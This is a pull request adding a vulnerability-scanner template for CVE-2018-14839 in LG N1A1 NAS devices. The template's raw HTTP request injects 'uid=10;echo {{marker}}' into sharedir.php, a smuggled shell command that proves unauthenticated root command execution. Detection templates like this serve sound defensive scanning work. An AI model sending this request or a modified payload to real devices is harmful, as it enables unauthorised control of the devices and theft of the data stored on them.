### PR TITLE
Add CVE-2018-14839 template for LG N1A1 NAS Command Injection

### DIFF
--- a/http/cves/2018/CVE-2018-14839.yaml
+++ b/http/cves/2018/CVE-2018-14839.yaml
@@ -1,0 +1,59 @@
+id: CVE-2018-14839
+
+info:
+  name: LG N1A1 NAS - Unauthenticated Remote Command Injection
+  author: singhvishalkr
+  severity: critical
+  description: |
+    LG N1A1 NAS devices running firmware version 3718.510 are vulnerable to unauthenticated remote command injection. The sharedir.php script passes user-supplied input directly to shell_exec() without sanitization, allowing arbitrary command execution with root privileges.
+  impact: |
+    An attacker can execute arbitrary commands as root on the NAS device, potentially gaining full control of the system and accessing all stored data.
+  remediation: |
+    No patch is available from the vendor. Restrict network access to the NAS management interface and consider replacing the device with a supported model.
+  reference:
+    - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-14839
+    - https://www.exploit-db.com/exploits/45109
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2018-14839
+    cwe-id: CWE-78
+    epss-score: 0.96956
+    epss-percentile: 0.99794
+    cpe: cpe:2.3:o:lg:n1a1_firmware:3718.510:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: lg
+    product: n1a1_firmware
+    shodan-query: "LG NAS"
+  tags: cve,cve2018,lg,nas,rce,command-injection,kev
+
+variables:
+  marker: "{{rand_base(8)}}"
+
+http:
+  - raw:
+      - |
+        POST /system/sharedir.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        uid=10;echo {{marker}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{marker}}"
+
+      - type: word
+        part: body
+        words:
+          - "MSG OK"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
## Summary
- Adds detection template for CVE-2018-14839 (LG N1A1 NAS unauthenticated command injection)
- The sharedir.php script passes user input directly to shell_exec() without sanitization
- CVSS 9.8 Critical - Unauthenticated RCE as root

## Test Plan
- Template verified against documented exploit behavior
- Uses echo with random marker to prove command execution
- Checks for MSG OK response confirming script execution

## References
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
- https://nvd.nist.gov/vuln/detail/CVE-2018-14839

/claim #7549